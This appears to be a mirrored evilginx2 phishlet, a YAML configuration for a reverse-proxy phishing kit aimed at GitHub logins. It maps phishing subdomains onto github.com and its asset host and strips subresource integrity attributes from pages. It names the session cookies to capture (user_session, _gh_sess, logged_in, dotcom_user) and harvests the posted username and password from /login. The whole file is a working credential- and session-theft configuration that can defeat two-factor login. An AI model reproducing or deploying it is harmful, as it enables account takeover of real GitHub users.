mirror of
https://github.com/kgretzky/evilginx2
synced 2026-06-08 15:15:53 +00:00
30 lines
763 B
YAML
30 lines
763 B
YAML
author: '@audibleblink'
|
|
min_ver: '2.3.0'
|
|
proxy_hosts:
|
|
- {phish_sub: '', orig_sub: '', domain: 'github.com', session: true, is_landing: true}
|
|
- {phish_sub: 'api', orig_sub: 'api', domain: 'github.com'}
|
|
- {phish_sub: 'github', orig_sub: 'github', domain: 'githubassets.com'}
|
|
|
|
sub_filters:
|
|
- {triggers_on: 'github.com', orig_sub: '', domain: 'github.com', search: 'integrity="(.*?)"', replace: '', mimes: ['text/html']}
|
|
|
|
auth_tokens:
|
|
- domain: '.github.com'
|
|
keys: ['logged_in', 'dotcom_user']
|
|
- domain: 'github.com'
|
|
keys: ['user_session', '_gh_sess']
|
|
|
|
credentials:
|
|
username:
|
|
key: 'login'
|
|
search: '(.*)'
|
|
type: 'post'
|
|
password:
|
|
key: 'password'
|
|
search: '(.*)'
|
|
type: 'post'
|
|
|
|
login:
|
|
domain: 'github.com'
|
|
path: '/login'
|